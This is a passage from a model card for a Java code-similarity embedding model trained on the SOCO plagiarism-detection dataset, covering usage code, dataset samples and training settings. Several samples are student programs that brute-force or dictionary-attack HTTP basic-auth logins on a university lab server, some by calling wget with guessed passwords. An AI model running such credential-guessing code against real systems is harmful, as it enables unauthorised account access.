\'y\', \'z\', \'A\', \'B\', \'C\', \'D\', \'E\', \'F\',\n\t \'G\', \'H\', \'I\', \'J\', \'K\', \'L\', \'M\', \'N\',\n\t \'O\', \'P\', \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\',\n\t \'W\', \'X\', \'Y\', \'Z\', \' \'\n };\n\n private final static char base64Array [] = {\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n \'w\', \'x\', \'y\', \'z\', \'0\', \'1\', \'2\', \'3\',\n \'4\', \'5\', \'6\', \'7\', \'8\', \'9\', \'+\', \'/\'\n };\n\n private static String base64Encode (String string) {\n String encodedString = "";\n byte bytes [] = string.getBytes ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length) {\n b3 = 0;\n pad = 1;\n }\n else\n b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2 & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString += base64Array [c1];\n encodedString += base64Array [c2];\n switch (pad) {\n case 0:\n encodedString += base64Array [c3];\n encodedString += base64Array [c4];\n break;\n case 1:\n encodedString += base64Array [c3];\n encodedString += "=";\n break;\n case 2:\n encodedString += "==";\n break;\n }\n }\n return encodedString;\n }\n }\n\n',
'\nimport java.io.*;\nimport java.awt.*;\nimport java.net.*;\n\npublic class BruteForce\n{\n\tpublic static void main (String[] args)\n\t{\n\t\tString pw = new String();\n\t\tpw = getPassword ();\n\t\tSystem.out.println("Password is: "+pw);\n\t}\n\tpublic static String getPassword()\n\t{\n\t\tString passWord = new String();\n\t\tpassWord = "AAA";\n\t\tchar[] guess = passWord.toCharArray();\n\t\tProcess pro = null;\n\t\tRuntime runtime = Runtime.getRuntime();\n\t\tBufferedReader in = null;\n\t\tString str=null;\n\t\tboolean found = true;\n\n\t\tSystem.out.println(" attacking.....");\n\t\tfor (int i=65;i<=122 ;i++ )\n\t\t{\n\t\t\tguess[0]=(char)(i);\n for (int j=65;j<=122 ;j++ )\n\t\t\t{\n\t\t\t\tguess[1]=(char)(j);\n for (int k=65 ;k<=122 ;k++ )\n\t\t\t\t{\n\t\t\t\t\tguess[2]=(char)(k);\n\t\t\t\t\tpassWord = new String(guess);\n\t\t\t\t\tString cmd = "wget --http-user= --http-passwd="+passWord +" http://sec-crack.cs.rmit.edu./SEC/2/index.php ";\n\t\t\t\t\ttry\n\t\t\t\t\t{\n\t\t\t\t\t\tpro = runtime.exec(cmd);\n\n\t\t\t\t\t\tin = new BufferedReader(new InputStreamReader(pro.getErrorStream()));\n\t\t\t\t\t\tfound = true;\n\t\t\t\t\t\tif((str=in.readLine())!=null)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\twhile ((str=in.readLine())!=null)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (str.endsWith("Required"))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tfound = false;\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tif (found == true)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\treturn passWord;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tcatch (Exception exception)\n\t\t\t\t\t{\n\t\t\t\t\t exception.getMessage();\n\t\t\t\t\t}\n\t\t\t\t\tif(k==90)\n\t\t\t\t\t\tk=96;\n\t\t\t\t\truntime.gc();\n\t\t\t\t}\n\t\t\t\tif(j==90)\n\t\t\t\t\tj=96;\n\t\t\t}\n\t\t\tif(i==90)\n\t\t\t\ti=96;\n\t\t}\n\t\treturn "not found";\n\t}\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[1.0000, 0.9549, 0.5951],
# [0.9549, 1.0000, 0.5695],
# [0.5951, 0.5695, 1.0000]])
```
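
Beyond the pairwise similarity matrix above, the embeddings can also drive retrieval, e.g. ranking stored code snippets against a query snippet. The `cosine` and `rank` helpers below are an illustrative, dependency-free sketch only; in practice `model.similarity` or `sentence_transformers.util.semantic_search` cover this:

```python
import math

# Cosine similarity between two embedding vectors.
def cosine(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(x * x for x in b))
    return dot / (norm_a * norm_b)

# Rank candidate embeddings by similarity to the query embedding,
# highest first; returns (index, score) pairs.
def rank(query_emb, candidate_embs):
    scores = [(i, cosine(query_emb, emb)) for i, emb in enumerate(candidate_embs)]
    return sorted(scores, key=lambda pair: pair[1], reverse=True)

# Toy 2-d vectors standing in for the model's 768-d embeddings.
query = [1.0, 0.0]
candidates = [[0.9, 0.1], [0.0, 1.0]]
print(rank(query, candidates))  # candidate 0 ranks first
```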
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### soco_train_java
* Dataset: [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) at [44ca4ff](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java/tree/44ca4ff546c090153d7903c15aeda036891ec476)
* Size: 34,368 training samples
* Columns: <code>anchor_code</code>, <code>positive_code</code>, and <code>negative_code</code>
* Approximate statistics based on the first 1000 samples:
| | anchor_code | positive_code | negative_code |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 51 tokens</li><li>mean: 465.94 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 466.25 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 458.71 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor_code | positive_code | negative_code |
  |:------------|:--------------|:--------------|
  | <code>import java.util.*;<br>import java.io.*;<br><br><br><br>public class WatchDog {<br><br>    public WatchDog() {<br><br>    }<br>    public static void main(String args[]) {<br>       DataInputStream newin;<br><br>       try{<br><br><br>         System.out.println("Downloading first copy");<br>     Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O oldfile.html");<br>     String[] cmdDiff = {"//sh", "-c", "diff oldfile.html newfile.html > Diff.txt"};<br>     String[] cmdMail = {"//sh", "-c", "mailx -s \"Diffrence\" \"@cs.rmit.edu.\" < Diff.txt"};<br>   while(true){<br>     Thread.sleep(24*60*60*1000);<br>     System.out.println("Downloading new copy");<br>     Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O newfile.html");<br>     Thread.sleep(2000);<br>     Runtime.getRuntime().exec(cmdDiff);<br>     Thread.sleep(2000);<br>     newin = new DataInputStream( new FileInputStream( "Diff.txt"));<br>     if (newin.readLine() != null){<br>        System.out.println("Sending Mail");<br>  ...</code> | <code>import java.util.*;<br>import java.io.*;<br>import javax.swing.text.html.*;<br><br><br>public class WatchDog {<br><br>    public WatchDog() {<br><br>    }<br>    public static void main (String args[]) {<br>       DataInputStream newin;<br><br>       try{<br>        System.out.println("ishti");<br><br>         System.out.println("Downloading first copy");<br>     Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O oldfile.html");<br>     String[] cmdDiff = {"//sh", "-c", "diff oldfile.html newfile.html > Diff.txt"};<br>     String[] cmdMail = {"//sh", "-c", "mailx -s \"Diffrence\" \"@cs.rmit.edu.\" < Diff.txt"};<br>   while(true){<br>     Thread.sleep(24*60*60*1000);<br>     System.out.println("Downloading new copy");<br>     Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O newfile.html");<br>     Thread.sleep(2000);<br>     Runtime.getRuntime().exec(cmdDiff);<br>     Thread.sleep(2000);<br>     newin = new DataInputStream( new FileInputStream( "Diff.txt"));<br>     if (newin.readLine() ...</code> | <code><br><br>import java.net.*;<br>import java.io.*;<br>import java.util.*;<br><br>public class BruteForce{<br><br>  private static URL location;<br>  private static String user;<br>  private BufferedReader input;<br>  private char [] password = {'A', 'A', 'A'};<br>  private int noLetters = 3;<br><br>  <br><br>  public BruteForce() {<br>    <br>    Authenticator.setDefault(new MyAuthenticator ());<br><br>     startTime = System.currentTimeMillis();<br>    boolean passwordMatched = false;<br>    while (!passwordMatched) {<br>      try {<br>        input = new BufferedReader(new InputStreamReader(location.openStream()));<br>        String line = input.readLine();<br>        while (line != null) {<br>          System.out.println(line);<br>          line = input.readLine();<br>        }<br>        input.close();<br>        passwordMatched = true;<br>      }<br>      catch (ProtocolException e)<br>      {<br>        <br>        <br>      }<br>      catch (ConnectException e) {<br>        System.out.println("Failed connect");<br>      }<br>      catch (IOException e)...</code> |
  | <code>import java.util.*;<br>import java.net.*;<br>import java.io.*;<br><br>public class BruteForce<br>{<br>    boolean connected = false;<br>    int counter;<br>    String[] chars = {"a","b","c","d","e","f","g","h",<br>                      "i","j","k","l","m","n","o","p",<br>                      "q","r","s","t","u","v","w","x",<br>                      "y","z","A","B","C","D","E","F",<br>                      "G","H","I","J","K","L","M","N",<br>                      "O","P","Q","R","S","T","U","V",<br>                      "W","X","Y","Z"};<br>    Vector combinations = new Vector();<br>    <br>    BruteForce()<br>    {<br>        counter = 0;<br>        this.genCombinations();<br>        this.startAttack();<br>    }  <br>    <br>    public void startAttack()<br>    {<br>        while(counter<this.combinations.size())<br>        {<br>            connected = sendRequest();<br>            if(connected == true)<br>            {<br>                System.out.print("The password is: ");<br>                System.out.println((String)combinations.elementAt(counter-1));<br>                counter = combinations.size(...</code> | <code>import java.util.*;<br>import java.net.*;<br>import java.io.*; <br><br>public class Dictionary<br>{<br>    boolean connected = false;<br>    int counter;<br>    <br>    Vector words = new Vector();<br>    <br>    Dictionary()<br>    {<br>        counter = 0;<br>        this.readWords(); <br>        this.startAttack();<br>    }  <br>    <br>    public void startAttack()<br>    {<br>        while(counter<this.words.size())<br>        {<br>            connected = sendRequest();<br>            if(connected == true)<br>            {<br>                System.out.print("The password is: ");<br>                System.out.println((String)words.elementAt(counter-1));<br>                counter = words.size();<br>            }<br>        }<br>    }<br>    <br><br>    public void readWords()<br>    {<br>        String line;<br><br>        try<br>        {<br>            BufferedReader buffer = new BufferedReader(<br>                new FileReader("/usr/share/lib/dict/words"));<br>            <br>            line = buffer.readLine();<br><br>            while(line != null)<br>            {<br><br>                if(line.length() <= 3)<br>      ...</code> | <code>import java.net.*;<br>import java.io.*;<br><br>public class BruteForce<br>{<br> public BruteForce(String u,String uname) throws Exception<br> {<br>  String pass="";<br>  try<br>  {<br>   String []chr={"a","b","c","d","e","f","g","h","i","j",<br>                 "k","l","m","n","o","p","q","r","s","t",<br>                 "u","v","w","x","y","z","A","B","C","D",<br>                 "E","F","G","H","I","J","K","L","M","N",<br>                 "O","P","Q","R","S","T","U","V","W","X","Y","Z"};<br>   URL url=new URL(u);<br>   PasswordAuthentication pa;<br>   MyAuthenticator =new MyAuthenticator();<br>   HttpURLConnection h;<br>   int c=0;<br>   for(int i=1;i<=52;i++)<br>   {<br>    c++;<br>    pass=""+chr[i-1];<br>    pa=new PasswordAuthentication(uname,pass.toCharArray());<br>    h.setPasswordAuthentication(pa);<br>    Authenticator.setDefault();<br>    h=(HttpURLConnection)url.openConnection();<br>    h.setRequestProperty("user-pass",URLEncoder.encode(":"+pass));<br>System.out.println("Try :"+chr(c)+" password:("+pass+") response message: ("+h.getResponseMessage()+")");<br>    if(h.getResponseCode() != 401)<br>     throw...</code> |
  | <code>import java.net.*;<br>import java.io.*;<br>import java.*;<br>import java.Runtime.*;<br>import java.Object.*;<br>import java.util.*;<br>import java.util.StringTokenizer;<br><br><br>public class ReadFile<br>{<br>    private StringTokenizer tokenizer;<br>    private BufferedReader bf;<br>    private String line;<br>    private String first;<br>    Vector in = new Vector();<br>    <br>    public void loadFile()throws NoSuchElementException, IOException<br>    {<br>        System.out.println("in loadFile");<br>        try{<br>            bf = new BufferedReader(new FileReader("words"));<br>        }<br>        catch(FileNotFoundException fe){}<br>        catch(IOException io){}<br>        while((line = bf.readLine())!=null)<br>        {<br><br>            int index = 0;<br>            tokenizer = new StringTokenizer(line);<br>            try<br>            {<br>                first = tokenizer.nextToken();<br>                <br>                <br>                if (first.length() == 3)<br>                {<br>                    in.add(first);<br>                }<br>            }<br>            catch(NoSuchElementException n)<br>            {<br>                System.out.println("File Loaded Succesfully");<br><br>            }<br><br>        }<br>    }<br>    public Vector getVector()<br>    {<br>        return in;<br>...</code> | <code>import java.net.*;<br>import java.io.*;<br>import java.*;<br>import java.Runtime.*;<br>import java.Object.*;<br>import java.util.*;<br>import java.util.StringTokenizer;<br><br>public class makePasswords<br>{<br>  public String [ ] alphabet1 = {"A", "B", "C", "D", "E", "F", "G", "H", "I",<br>  "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X",<br>  "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m",<br>  "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"};<br>  <br>  public String [ ] alphabet2 = {"A", "B", "C", "D", "E", "F", "G", "H", "I",<br>  "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X",<br>  "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"};<br>  <br>  public String [ ] alphabet3 = {"A", "B", "C", "D", "E", "F", "G", "H", "I",<br>  "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X",<br>  "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", ...</code> | <code>package java.httputils;<br><br>import java.io.BufferedInputStream;<br>import java.io.BufferedOutputStream;<br>import java.io.BufferedReader;<br>import java.io.FileInputStream;<br>import java.io.FileNotFoundException;<br>import java.io.FileOutputStream;<br>import java.io.FileReader;<br>import java.io.IOException;<br>import java.io.OutputStream;<br><br><br>public class WatchDog<br>{<br>    protected final int MILLIS_IN_HOUR = (60 * 60 * 1000);<br>    protected int interval = 24;<br>    protected String URL = "http://www.cs.rmit.edu./students/";<br>    protected String fileName = "WatchDogContent.html";<br>    protected String command = "./alert_mail.sh";<br>    protected String savedContent;<br>    protected String retrievedContent;<br><br>    <br>    public WatchDog()<br>    {<br>        super();<br>    }<br><br>    <br>    public void run() throws Exception<br>    {<br>        HttpRequestClient client = null;<br>        <br>        <br>        System.out.println(getClass().getName() +<br>            "Retrieving baseline copy of: " + getURL());<br>        client = new HttpRequestClie...</code> |
* Loss: [<code>CachedMultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"mini_batch_size": 32,
"gather_across_devices": false
}
```
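For orientation, here is a minimal pure-Python sketch of what the `scale` and `cos_sim` parameters above control (an illustration of the loss mechanics, not code from this card): each anchor is scored against every positive in the batch with cosine similarity, the matrix is multiplied by `scale`, and cross-entropy then treats the diagonal entry as the correct pair.

```python
import math

def cos_sim(a, b):
    # Cosine similarity between two vectors.
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(x * x for x in b))
    return dot / (norm_a * norm_b)

def mnrl_logits(anchors, positives, scale=20.0):
    # Row i scores anchor i against every positive in the batch;
    # the diagonal entry is the matching pair the loss pushes up.
    return [[scale * cos_sim(a, p) for p in positives] for a in anchors]

# Toy 2-D embeddings: each anchor is most similar to its own positive.
anchors = [[1.0, 0.0], [0.0, 1.0]]
positives = [[1.0, 0.1], [0.1, 1.0]]
logits = mnrl_logits(anchors, positives)
```

The cached variant computes the same logits but in `mini_batch_size` chunks with gradient caching, so large effective batches fit in memory.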
### Evaluation Dataset
#### soco_train_java
* Dataset: [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) at [44ca4ff](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java/tree/44ca4ff546c090153d7903c15aeda036891ec476)
* Size: 8,592 evaluation samples
* Columns: <code>anchor_code</code>, <code>positive_code</code>, and <code>negative_code</code>
* Approximate statistics based on the first 1000 samples:
| | anchor_code | positive_code | negative_code |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 51 tokens</li><li>mean: 465.22 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 464.66 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 458.05 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor_code | positive_code | negative_code |
|:---|:---|:---|
| <code><br><br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class WatchDog<br>{ <br><br> public static void main(String args[])<br> {<br><br> Runtime rt1 = Runtime.getRuntime();<br> Process prss1= null;<br><br> try<br> {<br> prss1 = rt1.exec("wget -R mpg,mpeg, --output-document=first.html http://www.cs.rmit.edu./students/");<br> }catch(java.io.IOException e){}<br><br> MyWatchDogTimer w = new MyWatchDogTimer();<br> Timer time = new Timer();<br> time.schedule(w,864000000,864000000);<br><br> <br> }<br>}<br></code> | <code> <br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class MyTimer<br>{ <br><br> public static void main(String args[])<br> {<br> Watchdog watch = new Watchdog();<br> Timer time = new Timer();<br> time.schedule(watch,864000000,864000000);<br> <br> <br> }<br>}<br></code> | <code>import java.net.*; <br>import java.io.*; <br>import java.util.Vector;<br>import java.util.Date;<br>import java.security.*;<br><br><br><br><br><br><br><br><br><br><br><br> <br>public class Dictionary { <br> public static BufferedReader in;<br> <br> <br> public static void main(String[] args) throws Exception { <br> String baseURL = "http://sec-crack.cs.rmit.edu./SEC/2/index.php"; <br> int count=0;<br> Date date = new Date();<br> startTime=date.getTime();<br> int LIMITINMINUTES=45;<br> int TIMELIMIT=LIMITINMINUTES*1000*60;<br> boolean timedOut=false;<br> boolean found=false;<br> <br> <br> Vector dictionary=new Vector(readWords());<br> System.out.println("Words in dictionary: "+dictionary.size());<br> <br> <br> <br> <br> <br> <br> <br> while (found==false && timedOut==false && dictionary.elementAt(count)!=null) {<br> <br> Date endDate = new Date();<br> endTime=endDate.getTime(); <br> if (endTime>(TIMELIMIT+startTime)){<br> System.out.println("Timed out");<br> timedOut=true;<br> }<br> <br> String password = "";<br><br> ...</code> |
| <code><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br><br><br>public class MailsendPropertyHelper {<br><br> private static Properties testProps;<br><br> public MailsendPropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the watchddog Props");<br> e.printStackTrace();<br> }<br> return testProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(testProps == null){<br> testProps = new Properties();<br><br> InputStream fis =<br> MailsendPropertyHelper.class.getResourceAsStream("/mailsend.properties");<br> testProps.load(fis);<br> }<br> }<br>}<br><br><br><br><br><br></code> | <code><br><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br>public class BruteForcePropertyHelper {<br><br> private static Properties bruteForceProps;<br><br><br><br> public BruteForcePropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the burteforce Props");<br> e.printStackTrace();<br> }<br> return bruteForceProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(bruteForceProps == null){<br> bruteForceProps = new Properties();<br><br> InputStream fis =<br> BruteForcePropertyHelper.class.getResourceAsStream("/bruteforce.properties");<br> bruteForceProps.load(fis);<br> }<br> }<br>}<br><br></code> | <code><br>import java.net.*;<br>import java.io.*;<br>import 
java.Ostermiller.util.*;<br>import java.util.*;<br><br>public class MyClient2 implements Runnable<br>{<br> private String hostname;<br> private int port;<br> private String filename;<br> private Socket s;<br> private int n;<br> private InputStream sin;<br> private OutputStream sout;<br> private int dif;<br> private String myPassword;<br> private int status;<br> private int myTime;<br> private BruteForce myMaster;<br> <br><br> public MyClient2(BruteForce bf , int num, int myPort, String password)<br> {<br> <br> hostname = new String("sec-crack.cs.rmit.edu.");<br> port = myPort;<br> status = 0;<br> myTime = 0;<br> myPassword = password;<br> filename = new String("/SEC/2/");<br> myMaster = 0;<br> n = num;<br> dif = 0;<br> <br> }<br> public getDif()<br> {<br> return dif;<br> }<br> public int getStatus()<br> {<br> return status;<br> }<br> public void run() <br> {<br> String inputLine;<br> String[] tokens = new String[5];<br> int i;<br> myTime = 0;<br> ...</code> |
| <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br>public class Dictionary<br>{<br> public static void main (String args[])<br> {<br> <br> <br> Calendar cal = Calendar.getInstance();<br> Date now=cal.getTime();<br> double startTime = now.getTime();<br><br> String password=getPassword(startTime);<br> System.out.println("The password is " + password);<br> }<br><br> public static String getPassword(double startTime)<br> {<br> String password="";<br> int requests=0;<br><br> try<br> {<br> <br> FileReader fRead = new FileReader("/usr/share/lib/dict/words");<br> BufferedReader buf = new BufferedReader(fRead);<br><br> password=buf.readLine();<br><br> while (password != null)<br> {<br> <br> if (password.length()<=3)<br> {<br> requests++;<br> if (testPassword(password, startTime, requests))<br> return password;<br> }<br><br> password = buf.readLine();<br><br> }<br> }<br> catch (IOException ioe)<br> {<br><br> }<br><br> return password;<br> }<br><br> private static boolean testPassword(String password, double startTime, int requests)<br> {<br> try<br> {<br> <br> <br> U...</code> | <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br>public class BruteForce<br>{<br><br> public static void main(String args[])<br> {<br> <br> <br> Calendar cal = Calendar.getInstance();<br> Date now=cal.getTime();<br> double startTime = now.getTime();<br><br> String password=getPassword(startTime);<br> System.out.println("The password is " + password);<br> }<br><br> public static String getPassword(double startTime)<br> {<br> char first, second, third;<br> String password="";<br> int requests=0;<br><br> <br> for (int i=65; i<123; i++)<br> {<br> requests++;<br> first = (char) i;<br><br> password = first + "";<br><br> <br> if (testPassword(password, startTime, requests))<br> return password;<br><br> for (int j=65; j<123; j++)<br> {<br> requests++;<br> second = (char) j;<br><br> password = first + "" + second;<br><br> <br> if 
(testPassword(password, startTime, requests))<br> return password;<br><br> for (int k=65; k<123; k++)<br> {<br> requests++;<br> third = (char) k;<br><br> password = first + "" + second + "" + third;<br><br> <br> if (test...</code> | <code><br><br>import java.misc.BASE64Encoder;<br>import java.misc.BASE64Decoder;<br>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br><br>public class Dictionary {<br> <br> public Dictionary(String url, String dictionaryFile) {<br> try{<br> this.url = url;<br> this.dictionaryPath = dictionaryFile;<br> InputStream fis = new FileInputStream(this.dictionaryPath);<br> dict = new BufferedReader(new InputStreamReader(fis));<br><br> }catch(IOException ioe){<br> System.out.println("Error opening dictionary file:\n" +ioe);<br> }<br> }<br><br><br> <br> private String url = null;<br> <br> private String dictionaryPath = null;<br> <br> private BufferedReader dict = null;<br> <br> private int attempts = 0;<br> <br> private int passwordSize = 3;<br> <br> public void setPasswordSize(int size){<br> this.passwordSize = size;<br> }<br> <br> public String getNextPassword()throws IOException{<br><br> String line = dict.readLine();<br><br> while(line!=null&&line.length()!=this.passwordSize )<br> line = dict.readLine();<br><br> return line;<br> }<br> <br> publ...</code> |
* Loss: [<code>CachedMultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"mini_batch_size": 32,
"gather_across_devices": false
}
```
### Training Hyperparameters
#### Non-Default Hyperparameters
- `per_device_train_batch_size`: 256
- `num_train_epochs`: 1
- `warmup_ratio`: 0.1
- `fp16`: True
- `batch_sampler`: no_duplicates
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: no
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 256
- `per_device_eval_batch_size`: 8
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 5e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 1
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `parallelism_config`: None
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch_fused
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `hub_revision`: None
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `liger_kernel_config`: None
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: no_duplicates
- `multi_dataset_batch_sampler`: proportional
- `router_mapping`: {}
- `learning_rate_mapping`: {}
</details>
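As a rough illustration of the schedule implied above (hypothetical step counts, not values from this run), `warmup_ratio: 0.1` with `lr_scheduler_type: linear` means the learning rate ramps from 0 to the peak of 5e-5 over the first 10% of steps, then decays linearly back to 0:

```python
def linear_schedule_lr(step, total_steps, base_lr=5e-5, warmup_ratio=0.1):
    # Linear warmup for the first warmup_ratio of training, then linear decay to 0.
    warmup_steps = int(total_steps * warmup_ratio)
    if step < warmup_steps:
        return base_lr * step / max(1, warmup_steps)
    remaining = total_steps - warmup_steps
    return base_lr * max(0.0, (total_steps - step) / max(1, remaining))

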